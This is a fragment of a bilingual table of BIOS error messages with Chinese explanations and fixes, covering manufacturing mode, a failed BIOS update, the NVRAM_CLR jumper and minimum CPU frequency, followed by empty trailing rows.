12 | | BIOS MANUFACTURING MODE detected.MANUFACTURING MODE will be cleared before the next boot.System reboot required for normal operation. | 系统处于生产模式。 | 请重新引导系统使其退出生产模式。 |
13 | | BIOS Update Attempt Failed! | 远程 BIOS 更新尝试失败。 | 请重新尝试更新 BIOS。 |
14 | | Caution!NVRAM\_CLR jumper is installed on system board | NVRAM\_CLR 跳线采用清除设置进行安装。CMOS 已被清除。 | 请将 NVRAM\_CLR 跳线移动到默认位置(插针 3 和 5)。 |
15 | | CPU set to minimum frequency. | 处理器速度可能出于节能考虑而有意设得较低。 | |
16 | | | | |
17 | | | | |
18 | | | | |
19 |
20 |
21 |
22 |
--------------------------------------------------------------------------------